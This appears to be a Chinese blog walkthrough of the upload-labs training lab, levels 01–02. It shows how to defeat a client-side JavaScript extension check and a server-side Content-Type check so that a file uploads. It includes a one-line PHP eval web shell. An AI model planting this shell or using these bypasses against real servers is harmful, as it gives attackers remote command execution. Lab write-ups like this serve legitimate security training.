upload-labs文件上传01-04_upload failed, check dev console

upload-labs

01 前端js绕过

ctrl+u查看源码

function checkFile() {
   
        var file = document.getElementsByName('upload_file')[0].value;
        if (file == null || file == "") {
   
            alert("请选择要上传的文件!");
            return false;
        }
        //定义允许上传的文件类型
        var allow_ext = ".jpg|.png|.gif";
        //提取上传文件的类型
        var ext_name = file.substring(file.lastIndexOf("."));
        //判断上传文件类型是否允许上传
        if (allow_ext.indexOf(ext_name) == -1) {
   
            var errMsg = "该文件不允许上传，请上传" + allow_ext + "类型的文件,当前文件类型为：" + ext_name;
            alert(errMsg);
            return false;
        }
    }
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

将var allow_ext = ".jpg|.png|.gif";改为var allow_ext = ".jpg|.png|.gif|.php";,用chrome浏览器，F12打开dev tool,在console里黏贴checkFile函数，执行checkFile即可上传php。

<!-- test.php -->
<?php
@eval($_POST['cmd']);
?>
1
2
3
4

02 MIME绕过(1)

服务端MIME类型检测也就是检测Content-Type的内容

Content-Type: application/octet-stream
Content-Type: image/jpeg
1
2

抓取正常的图片流量，与源码对比

抓包
Content-Disposition: form-data; name="upload_file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Disposition: form-data; name="submit"
ctrl+u:源码
<input class="input_file" 
1
2
3
4
5